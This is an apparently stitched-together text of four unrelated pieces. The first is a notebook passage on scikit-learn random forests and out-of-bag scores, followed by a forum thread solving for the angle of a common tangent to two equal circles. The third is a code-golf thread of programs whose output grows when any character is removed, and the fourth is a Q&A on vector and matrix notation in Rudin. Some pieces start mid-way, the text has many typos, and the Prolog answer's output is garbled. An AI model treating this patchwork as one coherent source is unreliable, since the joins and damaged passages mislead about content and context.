Random Forest brings bagging to the feature selection step. $N$ trees are grown on a boostrapped dataset than, before each split, the algorithm randomly picks $m \leq p$ variables as candidates for splitting. The best candidate is picked according to an heuristic, and the node is split in left/right children. After $N$ such trees are grown, the algorithm combines their predictions. In case of regression trees, this means averaging the output of the ensamlbe of $f$ models as: $f_{rf}(x) = \frac{1}{N} \sum_{n=1}^{N} f_n (x)$. For classification forests, a common combination strategy is majority voting. A common value for $m$ is $\sqrt{p}$, the intuition being that small values of $m$ reduce the correlation between pair of trees, hence reduce the variance of the ensemble.
Regression and classification with Random Forests¶
sklearn.ensemble.RandomForestRegressor and sklearn.ensemble.RandomForestClassifier are interaces for building ensembles of DecisionTreeRegressor and DecisionTreeClassifier respectively. The criteria for determining node impurity are the same as we've seen before: mse for regression trees and gini or entropy for classification trees. The logic for growing and combining the ensemble output is implemented in sklearn.ensemble.ForestRegressor and sklearn.ensemble.ForstClassifier
oob_score¶
Random Forest is known to be a robust classifier that does not overfit; the authors claim no need for cross-validation or even using a test set for model selection (https://www.stat.berkeley.edu/~breiman/RandomForests/cc_home.htm#features). An estimate of the generalization error can be obtains as part of the algorithm run, by leaving out a portion of the bootstrap dataset used for fitting each tree and use it to build a test dataset across the $N$ trees with all data points left out by all trees. That is, but building an out-of-bag test set on the go. This behaviour is controlled by the boolean oob_score parameter. On a fitted model, the oob_score argument will then report the error estimate for the ensemble.
In sklearn the out-of-bag error is calculated in _set_oob_score in ForestRegressor and ForestClassifier. For regression trees, the oob score is expressed as the sum of the $R^2$ of each predictor on the oob dataset, averaged over the number of predictors. For classification trees, it is the vote given by each predictors oob_decision_function that for a forest of $k$ trees is a list of
decision = (predictions[k] /
predictions[k].sum(axis=1)[:, np.newaxis])
where predictions[k] is the sum of class probabilities predicted by the predict_proba(X) method, for some test input $X$, that for a singe tree $k$ is the fraction of samples of the same class in a leaf.
Intepretability of random forest¶
With Random Forest we lose the capability visualizing the model as a decision tree diagram. However, we can still access the feature importance vector for the whole fitted esemble with the feature_importances_ property. This is computed as
sum(all_importances) / len(self.estimators_)
Extra trees¶
sklearn allows for Extremely Randomized Trees to be used instead of Decision Trees to compose an ensemble. I won't cover the working of ExtraTree in this notebook. For a very concise comparison see http://stackoverflow.com/questions/22409855/randomforestclassifier-vs-extratreesclassifier-in-scikit-learn
Categorical features¶
In the toy examples above, I've dealt only with numerical features. Fitting models with categorical variables might be a bit confusing if you come from evirnoment like R, where the most common implementations are either able to handle categorical variables natively, or take care of encoding them. In sklearn, a bit more work is necessary to encode categorical variables using eg. Hashing Trick (sklearn.feature_extraction.FeatureHasher) and One-Hot-Encoding (). Alternatively, Pandas provides the convenient DataFrame.get_dummies() method.
Suprisingly, to me at least, when growing trees on large datasets sklearn behaves well even with integer enconding of categorical features. See https://stackoverflow.com/questions/15821751/how-to-use-dummy-variable-to-represent-categorical-data-in-python-scikit-learn-r and https://github.com/szilard/benchm-ml/issues/1
|
|
# Math Help - Line tangent to 2 equal cirlces
1. ## Line tangent to 2 equal cirlces
Hey guys,
I need to find the angle that is in the picture below. I know the radius of the both cirlces (they are both the same) and I know the distance between the two circles.
I am baffled as to how I should approach this!
2. I'm always a fan of Brute Force.
Put your circles on a set of coordinate axes, once circle (radius r and center (0,0)) at the origin and the other (radius R and center (a,0)) on the positive x-axis.
Points on the origin circle look like this: (b,c) where $b^{2} + c^{2} = r^{2}$
Points on the remote circle look like this: (d,e) where $(d-a)^{2} + e^{2} = R^{2}$
Just to emphasize that the circles do not intersect, let's also define f > 0 so that a = r + f + R
The line has equation $y-e = \frac{e-c}{d-b}(x-d)$
You can use calculus or or algebra to show that the line is perpendicular to a radius at the points of tangency.
$\frac{e-c}{d-b} = -\frac{b}{c}$ and $\frac{e-c}{d-b} = -\frac{d}{e}$
That's enough information to find the points. The angles aren't too tricky after that. Let's see what you get. It will be fun!
Note: I have no doubt there is an elegant way to do this, like tocbol's geometry solution. I couldn't do that because I did not use the fact that the radii were the same. My solution is more general. If nothing else, this little demonstration should encourage you that you ALWAYS should be able to find SOME approach. It may be ugly, but it's better than the frustration inherent in just staring at it. Once you have the solution, you can search for elegance.
3. Originally Posted by VooDoo
Hey guys,
I need to find the angle that is in the picture below. I know the radius of the both cirlces (they are both the same) and I know the distance between the two circles.
I am baffled as to how I should approach this!
Whether the centers of the two circles are in the same horizontal line or not, the solution will be the same.
The common tangent line is perpendicular to the radii of both circles at the points of tangency.
Given or known:
>>>radius of both circles is, say, r.
>>>distance between the two centers is, say, d.
Draw the d.
The slant line or the common tangent line bisects the d.
Two similar and congruent right triangles are formed.
Each one has a leg of r and a hypotenuse of d/2.
The angle we are solving for, the central angle, is included in these two known sides.
So,
cos(theta) = r / (d/2)
cos(theta) = 2r/d
Therefore,
4. Originally Posted by VooDoo
Hey guys,
I need to find the angle that is in the picture below. I know the radius of the both cirlces (they are both the same) and I know the distance between the two circles.
I am baffled as to how I should approach this!
ok i assume that the angle u are referring to is the angle formed between the two radii.
u also said that the following is known:
• the radius of both circles, which u said are the same and that implies that the shape of both circles are the same ie. same area, circumference etc.
• the distance between the two circles
So what u need to do is to complete the diagram 1st ..... connect the distance between the 2 circles via a straight line to their radii. (Also the tangent would cut this line (the distance between the 2 circles) in half, so they will be equidistance apart.)
Therefore the angles that are required to find, now become alternate angles which are equal in size.
Furthermore, we know the theorem which states that a radius is perpendicular to a tangent at the point of contact.
Based on the above info u should now be able to form a triangle, whose 2 sides are known (one of the radius and the other radius plus half the distance between the 2 circles) as well as the perpendicular angle (90 degree).
Thus using the sine rule
$\frac{a}{sin A} = \frac{b}{sin B}$, substitute the 3 values above and hence find the size of the required angle.
5. Hello, VooDoo!
I need to find the angle that is in the picture below.
I know the radius of the both cirlces (they are both the same)
and I know the distance between the two circles.
Code:
o * B
* θ |
o* |
* o |r
C E * o |
o o * * * * * * * * * * * o o
| o * D
r| o *
| *o
|θ *
A * o
The circles have centers at A and B.
The radius is: . $AC \,=\, BD \,=\, r$
The line joining the centers is $AB \,= \,d$
The common tangent is $CD$
They intersect at $E.$
Right triangles ACE and BDE are congruent.
. . Hence: . $AE \,=\,EB \,=\,\frac{1}{2}d$ .and . $\theta \,=\,\angle CAE \,=\,\angle DBE$
In right triangle $ACE\!:\;\;\cos\theta \:=\:\frac{AC}{AE} \:=\:\frac{r}{\frac{1}{2}d}$
Therefore: . $\theta \;=\;\arccos\left(\frac{2r}{d}\right)$
Ahhh, ticbol beat me to it!
.
6. Originally Posted by ticbol
Two similar and congruent right triangles are formed.
Each one has a leg of r and a hypotenuse of d/2.
lol, silly me i proceeded to use sine rule instead of Pythagoras' theorem when it was so obvious. but i guess either way should end up with the same answer.
|
|
# More is less and less is more
Anybody can make the output of a program bigger by adding characters, so let's do the exact opposite.
Write a full program, an inner function or a snippet for a REPL environment in a language of your choice that satisfies the following criteria:
1. Your code must be at least 1 character long.
2. Running the original code produces x characters of output to STDOUT (or closest alternative), where 0 ≤ x < +∞.
3. Removing any arbitrary single character from the original code results again in valid code, which produces at least x + 1 characters of output to STDOUT.
4. Neither the original code nor the modifications may produce any error output, be to STDOUT, STDERR, syslog or elsewhere. The only exceptions to this rule are compiler warnings.
Your program may not require any flags or settings to suppress the error output.
Your program may not contain any fatal errors, even if they don't produce any output.
5. Both the original code and the modifications must be deterministic and finish eventually (no infinite loops).
6. Neither the original code nor the modifications may require input of any kind.
7. Functions or snippets may not maintain any state between executions.
Considering that this task is trivial is some languages and downright impossible in others, this is a .
When voting, please take the "relative shortness" of the code into account, i.e., a shorter answer should be considered more creative than a longer answer in the same language.
• While the 1 byte solution is impressive, it would be more impressive to see who can come up with the highest ratio of x:x+n. i.e. the length of normal output compared to the average length of output when any one character is removed. Adds an extra challenge to this question in my opinion. Jun 24 '15 at 2:49
• @FizzBuzz Easy: 111111111111111111^111111111111111111 (if you meant the lowest ratio). Jun 24 '15 at 12:30
• Aw, just noticed 'no infinite loops.' I was working on creating a ><> program that would create output faster if an one character was removed, such that after a constant k instructions, the output of each program is strictly greater than the output of the original from then on (because the other programs would loop faster or output more each loop). It was looking pretty interesting. Maybe I'll see if I can finish it anyway, and make another challenge. Jun 24 '15 at 17:28
• An interesting scoring metric for this challenge could be "most unique characters, ties go to shortest length". We would then try to get all the characters in a string literal though. Jul 1 '15 at 23:11
• What is meant by an inner function? Apr 1 '19 at 4:16
# Any REPL with caret XOR operation, 5 bytes
11^11
11^11 is of course 0. The only other possibilities are 1^11 or 11^1 which are 10, or 1111 which produces itself.
• Well played, feersum. Well played. Jun 23 '15 at 19:48
• Minus would also do the trick. Jun 23 '15 at 19:49
• Similarly, 99|99 Jun 24 '15 at 3:30
• @Challenger5 -10 is longer than 0. Nov 8 '17 at 8:20
• @MartinEnder Oh, I see. For some reason I thought it had to be a larger number. Nov 8 '17 at 8:25
# TI-BASIC, 3 1
"
When the last line of a program is an expression, the calculator will display that expression. Otherwise, the calculator displays Done when the program finishes. The expression here is the empty string, but it could also work with any one-digit number.
### 2 bytes:
isClockOn
Same as the above but with a 2-byte token.
### 3 bytes:
ππ⁻¹
Prints 1 due to implied multiplication. Can be extended indefinitely by adding pairs of ⁻¹'s. The below also work.
√(25
e^(πi
⁻ii
ii³
2ππ
cos(2π
### Longer solutions:
11/77►Frac
ᴇ⁻⁻44
cos(208341 //numerator of a convergent to pi; prints "-1"
There are probably also multi-line solutions but I can't find any.
• I'm not familar with TI BASIC. Are you counting the sqrt and parenthesis as a single character? Jun 23 '15 at 20:03
• Yes, the sqrt and parenthesis are together a single token, stored as one byte in the calculator's memory and entered with one keypress. Jun 23 '15 at 20:04
• finally a way to stop that annoying Done message! Jun 23 '15 at 20:33
• There is no Done token; the calculator displays Done when finished executing any program without an expression on the last line (including the empty program). Jun 28 '15 at 17:27
# CJam, JavaScript, Python, etc, 18 bytes
8.8888888888888888
The outputs in CJam are:
8.8888888888888888 -> 8.88888888888889
8.888888888888888 -> 8.888888888888888
88888888888888888 -> 88888888888888888
.8888888888888888 -> 0.8888888888888888
JavaScript and Python work in similar ways. It isn't competitive in JavaScript and Python, but it's not easy to find a shorter one in CJam.
• Nice floating-point abuse! Jun 25 '15 at 1:10
# Octave, 5 bytes
10:10
(x : y) gives the array of numbers between x and y in increments of 1, so between 10 and 10 the only element is 10:
> 10:10
ans = 10
When the second argument is less than the first, octave prints the empty matrix and its dimensions:
> 10:1
ans = [](1x0)
> 10:0
ans = [](1x0)
When a character is removed from the first number, there are more elements in the array:
> 1:10
ans = 1 2 3 4 5 6 7 8 9 10
> 0:10
ans = 0 1 2 3 4 5 6 7 8 9 10
When the colon is removed, the number returns itself:
> 1010
ans = 1010
• also valid in R
– mnel
Mar 8 '16 at 10:17
# Microscript, 1 byte
h
This produces no ouput, as h suppresses the language's implicit printing. Removing the sole character produces a program whose output is 0\n.
I'll try to come up with a better answer later.
EDIT ON NOVEMBER 17:
This also works in Microscript II, with the exception that, instead of yielding 0\n, the empty program yields null.
# Pyth, 3 bytes
cGG
G is preinitialized with the lowercase letters in the alphabet. c is the split-function.
cGG splits the alphabet by occurrences of the alphabet, which ends in ['', ''] (8 bytes).
When the second parameter is missing, c splits the string by whitespaces, tabs or newlines. Since none of them appear in G, the output for cG is ['abcdefghijklmnopqrstuvwxyz'] (30 bytes).
And GG simply prints twice the alphabet on two seperate lines: abcdefghijklmnopqrstuvwxyz\nabcdefghijklmnopqrstuvwxyz (53 bytes).
Try it online: Demonstration
# Python REPL, 6 bytes
Not the shortest, but here's another floating point abuse answer:
>>> 1e308
1e+308
>>> 11308
11308
>>> 11e08
1100000000.0
>>> 11e38
1.1e+39
>>> 11e30
1.1e+31
But...
>>> 11e308
inf
JavaScript (and a lot more), 5byte
44/44 or
44/44 -> 1
44/4 -> 11
4444 -> 4444
4/44 -> 0.09090909090909091
# CJam, 5
''''=
Try it online
''''= compares two apostrophes and prints 1
'''= prints '=
'''' prints ''
# Lenguage, 5 bytes
00000
The length of the program is 5 which corresponds to the brainf*** program , reading an end of input character and terminating without output.
Removing any char results in the code 0000 which has a length of 4 corresponding to the brainf*** program . printing out one character (codepoint 0) and terminating.
The Unary equivalent would be 0000000000000 (13 zeros) because you have to prepend a leading 1 to the binary length of the code so 101 becomes 1101.
# Python, 10 8 bytes
256**.25
Works in Python and friends. Thanks to Jakube for showing how to make it 2 bytes smaller.
From IDLE:
>>> 256**.25
4.0
>>> 26**.25
2.2581008643532257
>>> 56**.25
2.7355647997347607
>>> 25**.25
2.23606797749979
>>> 256*.25
64.0
>>> 256*.25
64.0
>>> 256**25
1606938044258990275541962092341162602522202993782792835301376L
>>> 256**.5
16.0
>>> 256**.2
3.0314331330207964
originally I had this (10 bytes):
14641**.25
From IDLE:
>>> 14641**.25
11.0
>>> 4641**.25
8.253780062553423
>>> 1641**.25
6.364688382085818
>>> 1441**.25
6.161209766937384
>>> 1461**.25
6.18247763499657
>>> 1464**.25
6.185648950548194
>>> 14641*.25
3660.25
>>> 14641*.25
3660.25
>>> 14641**25
137806123398222701841183371720896367762643312000384664331464775521549852095523076769401159497458526446001L
>>> 14641**.5
121.0
>>> 14641**.2
6.809483127522302
and on the same note:
121**.25*121**.25
works identically due to nice rounding by Python, in 17 bytes.
>>> 121**.25*121**.25
11.0
>>> 21**.25*121**.25
7.099882579628641
>>> 11**.25*121**.25
6.0401053545372365
>>> 12**.25*121**.25
6.172934291446435
>>> 121*.25*121**.25
100.32789990825084
>>> 121*.25*121**.25
100.32789990825084
>>> 121**25*121**.25
3.8934141282176105e+52
>>> 121**.5*121**.25
36.4828726939094
>>> 121**.2*121**.25
8.654727864164496
>>> 121**.25121**.25
29.821567222277217
>>> 121**.25*21**.25
7.099882579628641
>>> 121**.25*11**.25
6.0401053545372365
>>> 121**.25*12**.25
6.172934291446435
>>> 121**.25*121*.25
100.32789990825084
>>> 121**.25*121*.25
100.32789990825084
>>> 121**.25*121**25
3.8934141282176105e+52
>>> 121**.25*121**.5
36.4828726939094
>>> 121**.25*121**.2
8.654727864164496
• @Akiino I do not understand the edit you made. The line you removed was one of the required possibilities and no different then any of the ones below it. Could you explain why you removed it? I rolled it back, but can concede to undo the action with adequate reasoning. Jan 7 '16 at 19:05
• My inner perfectionist just couldn't sleep well knowing that the line (the one that i removed) is duplicated for no reason. There are lines 56..., 26... and then 56... again, but there is only one way to get 56, so it should be included only once, isn't it?
– user38962
Jan 9 '16 at 12:01
• Oh, I didn't see that it was on there twice. My bad, good catch. Jan 9 '16 at 18:51
• I rolled back my rollback. Jan 9 '16 at 18:52
# PHP, 6 bytes
I have been watching this group for a couple of weeks and am amazed of your programming techniques. Now I had to sign in, there is something I can do, sorry :-) However, this might be my last post here...
<?php
(note the space after second p)
This outputs empty string. Removing any character outputs the text without the character. Note it can produce HTML errors (content not rendered by browsers for eg. <?ph).
I also tried with the echo tag. ie. eg.:
<?= __LINE__;;
This one outputs 1. If = is omitted, <? __LINE__;; is the output. However, removing any of the magic constant character will result in E_NOTICE: Notice: Use of undefined constant LNE - assumed 'LNE' in...
If notices are not considered errors (point 4 of rules), this also applies :-)
• Oh, that's clever. I guess a linefeed would work as well. If the task was to produce HTML, this would be invalid. However, PHP can be run from the command line, just like any other programming language, where the output is simply printed to the screen. Jun 25 '15 at 20:43
• @Dennis PHP outputs anything. You can always use CTRL-U in your browser to see the output. HTML might be invalid, but in fact the program is not (there is no <HTML> tag etc.) Jun 25 '15 at 20:45
• My point is that there's no need to involve a browser at all. Just execute php test.php. The second code is invalid by the way. The question does not forbid errors but error output, meaning errors, warning, notices, etc. Jun 25 '15 at 20:48
• #! in a script file also works. Jun 26 '15 at 1:46
__A=__A.
Note: You cannot remove the final .. Prolog interpreters will always look for a final period to run your query, so if we stick strictly to the rules of this contest and allow ourselves to remove the period it won't run, it will jump a line and wait for additional commands until one is ended by a period.
The original query __A=__A. outputs true..
The query _A=__A. outputs _A = '$VAR'('__A'). Similar modifications (i.e. removing one _ or one of the two A) will result in similar outputs. Finally, the query __A__A. outputs in SWI-Prolog: % ... 1,000,000 ............ 10,000,000 years later % % >> 42 << (last release gives the question) • @Jakube I don't see how having a mandatory final period is a lot different than having to input the enter key to run a snippet in another language. If you remove the linefeed it won't run either. Jun 24 '15 at 9:34 • It is more equivalent to a semicolon in some languages, and that does count as a character. Jun 29 '15 at 16:26 # Sed, 1 byte d As sed requires an input stream, I'll propose a convention that the program itself should be supplied as input. $ sed -e 'd' <<<'d' | wc -c
0
\$ sed -e '' <<<'d' | wc -c
2
An alternative program is x, but that only changes from 1 to 2 bytes of output when deleted.
# K, 3 bytes
2!2
Outputs 0 in the REPL. Removing the first 2 outputs 0 1, removing the exclamation results in 22, and removing the last 2 results in a string that varies between K implementations but is always at least 2 characters (in oK, it's (2!); according to @Dennis, Kona outputs 2!).
• @Sp3000 Removing the * just prints 2. Removing the 2 prints (*!) (an incomplete function) in oK; I don't know about other interpreters (e.g. Kona, k2, etc.), although I believe Kona would print *[!;] or something similar. I went with removing the star because it seemed the safest. Jun 24 '15 at 1:23
• You can't choose, It must work removing any character Jun 24 '15 at 1:24
• @edc65 Fixed at the expense of not a single byte. Jun 24 '15 at 2:01
• @Dennis Updated. Jun 24 '15 at 14:22
# MATLAB, 9 7 bytes
It's 2 bytes longer than the other MATLAB/Octave answer, but I like it nonetheless, as it's a bit more complex.
Matlab's ' operator is the complex conjugated transpose. Using this on a scalar imaginary number, you get i' = -i. As imaginary numbers can be written simply as 2i one can do:
2i--2i'
ans =
0
Removing any one of the characters will result in one of the below:
ans =
0.0000 - 1.0000i
2.0000 - 2.0000i
0.0000 + 4.0000i
0.0000 + 4.0000i
0.0000 + 1.0000i
2.0000 + 2.0000i
0.0000 + 4.0000i
# GolfScript, 2 bytes
This answer is non-competing, but since it is the piece of code that inspired this challenge, I wanted to share it anyway.
:n
By default, all GolfScript programs print the entire stack, followed by a linefeed, by executing puts on the entire stack. The function puts itself is implemented as {print n print} in the interpreter, where print is an actual built-in and n is a variable that holds the string "\n" by default.
Now, a GolfScript program always pushes the input from STDIN on the stack. In this case, since there isn't any input, an empty string is pushed. The variable assignment :n saves that empty string in n, suppressing the implicit linefeed and making the output completely empty.
By eliminating n, you're left with the incomplete variable assignment : (you'd think that's a syntax error, but nope), so the implicit linefeed is printed as usual.
By eliminating :, you're left with n, which pushes a linefeed on the stack, so the program prints two linefeeds.
# J, 5 bytes
|5j12
Magnitude of the complex number 5 + 12i in REPL.
|5j12 NB. original, magnitude of the complex number 5 + 12i
13
5j12 NB. the complex number 5 + 12i
5j12
|j12 NB. magnitude of the undefined function j12
| j12
|512 NB. magnitude of 512
512
|5j2 NB. magnitude of 5 + 2i
5.38516
|5j1 NB. magnitude of 5 + 1i
5.09902
.
# J, 9 bytes
%0.333333
Based on floating point precision, reciprocal and matrix inverse.
%0.333333 NB. original, reciprocal of 0.333333
3
0.333333 NB. 0.333333
0.333333
%.333333 NB. matrix inverse of 333333
3e_6
%0333333 NB. reciprocal of 333333
3e_6
%0.33333 NB. reciprocal of 0.33333
3.00003
Try it online here.
# APL, J and possibly other variants, 3 bytes
--1
It outputs 1 in APL. -1 outputs ¯1, and -- outputs the following in TryAPL:
┌┴┐
- -
# Mathematica, 3 bytes
4!0
4!0 -> 0 the factorial of 4, times 0
4! -> 24 the factorial of 4
40 -> 40
!0 -> !0 the logical not of 0, but 0 is not a boolean value
# Dyalog APL, 2 bytes
⍴0 returns an empty string (length 0)
⍴ returns ⍴ (length 1)
0 returns 0 (length 1)
# Swift (and a lot more), 8 bytes
93^99<84
output (4 chars):
true
When removing the nth character the output is:
n -> out
----------
0 -> false
1 -> false
2 -> false
3 -> false
4 -> false
5 -> 10077
6 -> false
7 -> false
There are 78 possible solutions like this in the format of a^b<c.
I think the goal of this challenge should be as many bytes as possible, because the more bytes, the more possible bytes to remove and therefore more difficult.
• I thought about that, but it would have been to easy for stack-based languages. If this was a code bowling challenge, aditsu would have an infinte score. His code can be repeated over and over again; each copy will do exactly the same. Jun 29 '15 at 23:41
• @Dennis Oh I see, yeah makes sense, but I think bytes are maybe not a very good measure for this task Jun 30 '15 at 1:13
• I agree. That's why it's a popularity contest. Most upvoted answer wins. Jun 30 '15 at 2:05
# MathGolf, 2 bytes
♂(
Try it online!
## Explanation
♂ Push 10
( Decrement TOS by 1
## Why does this work?
The regular output is 9. If the ( is removed, the output is 10. If the ♂ is removed, the program implicitly pops a 0 from the stack to feed the ( operator, which outputs -1.
# 05AB1E (legacy), 1 byte
Any single byte in 05AB1E (legacy) would work, except for [ (infinite loop).
See here all possible outputs for all possible single-byte 05AB1E programs.
Removing that single byte so an empty program remains will output the content of info.txt to STDOUT instead by default.
Try it online.
# 05AB1E, 1 byte
?
Try it online.
Unfortunately an empty program in the new version of 05AB1E only outputs a 1-byte newline by default (Try it online), so almost none of the 1-byte characters are possible since they'll have to output nothing. The only possible program that outputs nothing (so also not the implicit newline) is ? as far as I know.
# Clojure, 11 bytes
(defn x[]1)
At first I thought to just post a single character answer in the REPL like the other languages, e.g.
user=> 1
1
But the problem is that if you remove that character, the REPL doesn't do anything upon the enter keypress. So instead it had to be wrapped with a function as permitted by the question's rules. When you call this function, it returns 1. If you remove the only character in the function,
(defn x[])
the function returns nil which prints an additional two bytes.
user=> (defn x[]1)
#'user/x
user=> (x)
1
user=> (defn y[])
#'user/y
user=> (y)
nil
• To clarify: The contest requires an inner function, which would be 1 in this case (1 byte). Jun 24 '15 at 16:24
# Japt, 2 bytes
AÉ
Try it online!
A is pre-initialized to 10, É subtracts 1, and the result is 1 byte: 9.
Removing É results in the program A, which outputs A's value, 10, so the result is 2 bytes.
Similarly, removing A results in just É which is interpreted as -1 and output as -1, so the result is 2 bytes.
# Runic Enchantments, 6 (modifiable) bytes
11-{{B\
/B~~@/
\00<
R"Error"@
Try it online!
Runic does not have a REPL environment and writing a full program to satisfy the constraints is not readily feasible (leading to either invalid programs or no output). So the portion of the code 11-{{B is acting as an inner function and only this portion can be modified. The B instruction is close enough to a function pointer and return statement that this classification should be acceptable (as it jumps the IP to a position in the code as well as pushing a return location to the stack which may be accessed by a subsequent B or discarded).
• Standard output: 0
• Removing either of the 1s: 05
• Removing the -: 11
• Removing either {: Error051
• Removing the B: 120
The final \ on the end of the first line provides an external boundary around the inner function in the event that the return instruction is removed so that the IP doesn't go meandering all over everywhere willy nilly (and print no output).
Note that Error051 is just an arbitrary string, I could put anything I wanted into that portion of the code and "Error" was an amusing result for having code that feks up the return coordinates and the IP teleports to an arbitrary location.
|
|
# Confused about notation in Ch.9 of Baby Rudin
So, I am taking a real analysis course, and we are currently on chapter 9 of baby rudin - Functions of Several Variables.
I do not have a strong linear algebra background, so I am having some difficulties with this chapter. I want to have a more intuitive understanding of the notation used in chapter 9, in regards to vectors and matrices.
If we consider $\mathbb{R^n}$ and a standard basis for $\mathbb{R^n}$ is $\{e_1, ..., e_n\}$, then we can write a vector $\mathbf{x}\in\mathbf{R^n}$ with a set of scalars, $\{c_1, ..., c_n \}$ so that
$\mathbf{x} = \sum_i^n c_i\mathbf{e_i}$. Okay, sure. Why this notation though? I always thought of a vector as just a list of components: ie $\mathbf{x} = (c_1x_1, ..., c_nx_n)$. Why are they being summed up here? Moreover, when Rudin goes on to define a matrix, (say $A$) he writes
\begin{bmatrix} a_{11} & a_{12} & a_{13} & \dots & a_{1n} \\ a_{21} & a_{22} & a_{23} & \dots & a_{2n} \\ \vdots & \vdots & \vdots & \ddots & \vdots \\ a_{d1} & a_{d2} & a_{d3} & \dots & a_{dn} \end{bmatrix}
However, isn't a matrix just a collection of vectors? Is there a "closed" summation notation for a matrix? Is there a proper, more succinct way to refer to a matrix? Why does he write vectors as summations and matrices as matrices?
And if $A: \mathbb{R^n} \rightarrow \mathbb{R^m}$, and $\{y_1, ..., y_m\}$ is a standard basis for $\mathbb{R^m}$, then why does he write
$A\mathbf{x} = \sum_i^m \sum_j^n a_{ij}c_i\mathbf{y_j}$? Do we really just have a set of scalars in $\mathbb{R^m}$?
• "Why this notation though? I always thought of a vector (in $\Bbb R^n$) as just a list of components." Because it allows us to generalize to alternative bases more easily. For a finite dimensional vector space, given any basis for the space (there are infinitely many choices, some may be more useful at times than others) we are guaranteed by definition to be able to write any vector from the space as a linear combination of the basis vectors, (even if the basis is more exotic than usual). – JMoravitz Apr 23 '18 at 5:16
• "Isn't a matrix just a collection of vectors?" No., it is most commonly thought of as an array of elements where certain operations like multiplication and addition of matrices is defined as we are used to. You can certainly shorthand things and say that the columns are each their own vector, but it kind of loses sight of what the entries technically are. "Is there a closed summation notation" sure... if you really want to. $M_{n\times m}(\Bbb R)$ is isomorphic as a vector space to $\Bbb R^{nm}$ so the same technique as before works here too. – JMoravitz Apr 23 '18 at 5:20
• "then why does he write.... Do we really just have a set of scalars in $\Bbb R^m$?" You seem to have missed that $y_j$ is a vector from $\Bbb R^m$. The expression is a linear combination of vectors from $\Bbb R^m$. – JMoravitz Apr 23 '18 at 5:22
• $\pmatrix{2\\-1\\3}=2\pmatrix{1\\0\\0}+(-1)\pmatrix{0\\1\\0}+3\pmatrix{0\\0\\1}$. – Lord Shark the Unknown Apr 23 '18 at 5:49
• You just need a basic course in linear algebra, and everything will fall into place. – Christian Blatter Apr 23 '18 at 8:29
Vectors are not "lists" of anything. Vectors are elements of vector spaces, i.e. sets of things that behave in a certain way – intuitively, like arrow-vectors from high school: they can be summed together, and they can be scaled by constants. You can find a precise definition of a vector space here.
1. If $V$ is real vector space, a linear combination of vectors is an expression $a_1 v_1 + \cdots + a_kv_k$, for finite $k$, which yields another vector in $V$. So, for example, if $V$ is the set of continuous functions over $(0,1)$, and $v_1,\dots,v_k$ are continuous functions over $(0,1)$, then all their linear combinations are also continuous functions over $(0,1)$ (you should have proved this when you first saw continuity). The numbers $a_i$ are called coefficients of the combination.
2. A subset $S$ of $V$ is said to be linearly independent, or we say that its elements are linearly independent, when there is no linear combination of its elements that yields the zero vector and has at least a non-zero coefficient. In other words, if $S$ is linearly independent and a linear combination of its elements yields the null vector, then all the coefficients must be $0$. Going back to $C^0((0,1))$, you should see that the monomials $\{x^1,\dots, x^k\}$ for $k \geq 2$ are linearly independent, i.e. $a_1 x^1 + \cdots + a_kx^k = 0$ implies $a_1 = \cdots = a_k = 0$. A more intuitive example would be a set of points in $\mathbb R^3$ such that no two points lie on the same line passing through the origin. (This last example helps in visualising that any subset of $V$ that contains the zero vector cannot be linearly dependent.)
3. A subset $B$ of $V$ is said to be a (Hamel) basis of $V$ when every vector in $V$ can be written as a linear combination of the elements in a finite subset of $B$, and the elements of $B$ are linearly independent. For example, the set of real polynomials of degree at most two, $\mathbb R_2[x] = \{a_0 + a_1 x + a_2x^2\}$, is a real vector space, and a basis of this space is $\{1,x,x^2\} \subset \mathbb R_2[x]$. Indeed the monomials are linearly independent, and every polynomial in $\mathbb R_2[x]$ can be expressed as a finite linear combination of these three vectors. This choice of basis is not unique: another valid basis is $\{2 - x, -x^2, x + 3x^2\}$. It can be shown that all bases of a vector space have the same number of elements, and that number is the dimension of $V$, $\dim V$.
So, once you have picked a basis, you can show that all $v \in V$ can be expanded as a linear combination of basis vectors in a unique way: $$v = a_1v_1 + \cdots + a_nv_n$$ that is, the coefficients $a_1,\dots,a_n$ are uniquely assigned to $v$. This means that, once a basis $(v_i)$ has been chosen, there is a bijection $\Phi$ between $V$ and $\mathbb R^n$, namely the one sending $v$ to $(a_1,\dots,a_n)$.
Now let me define what a matrix is. Technically, you could say that a real matrix $A$ of order $n\times m$ is a map from a subset $\{(i,j) \in \mathbb N^2\ |\ 1 \leq i \leq n, 1 \leq j \leq m\}$ of $\mathbb N^2$ to the real numbers. Intuitively, though, we do not think of a matrix as a map: we prefer to describe directly it by the values it attains, i.e. as an array of numbers
$$A = \begin{bmatrix} a_{11} & \cdots & a_{1m} \\ \vdots & \ddots & \vdots \\ a_{n1} & \cdots & a_{nm} \end{bmatrix}$$
The set of all real $m \times n$ matrices is denoted $M_{n \times m}(\mathbb R)$ and (surprise!) it can be shown that it is a vector space with the natural definition of matrix addition and scalar multiplication. Actually, it turns out that you can even define a matrix product ($\neq$ scalar multiplication!) between matrices of different dimensions, $\cdot : M_{n \times m}(\mathbb R) \times M_{m \times k}(\mathbb R) \to M_{n\times k}(\mathbb R)$ such that $A\cdot B = C$ with $c_{ij} = \sum_{k=1}^m a_{ik}b_{kj}$.
Back to vectors. Suppose $V$ and $W$ are finite-dimensional real vector spaces of dimensions $n$ and $m$ respectively. A linear map between $V$ and $W$ is a function $f$ such that, for all $v,v' \in V$ and $a,a' \in \mathbb R$, $f(av + a'v') = af(v) + a'f(v')$. The space of all linear functions from $V$ to $W$ is denoted $\mathrm{Hom}(V;W)$. Now let $(v_i)$ be a basis to $V$ and $(w_j)$ a basis to $W$, and let $f \in \mathrm{Hom}(V;W)$. Since every $f(v_i)$ is a member of $W$, we may expand it through the basis $(w_j)$ as $$f(v_i) = \sum_{j=1}^m a_{ij} w_j$$ So, in some sense, once bases have been chosen in the domain and codomain of $f$, there is a correspondence between $f$ itself and a matrix $(a_{ij})$. It turns out that this association has many nice properties, prominently that if $f,g$ are linear maps and $A,B$ their associated matrices, the matrix associated with $f \circ g$ is $A \cdot B$.
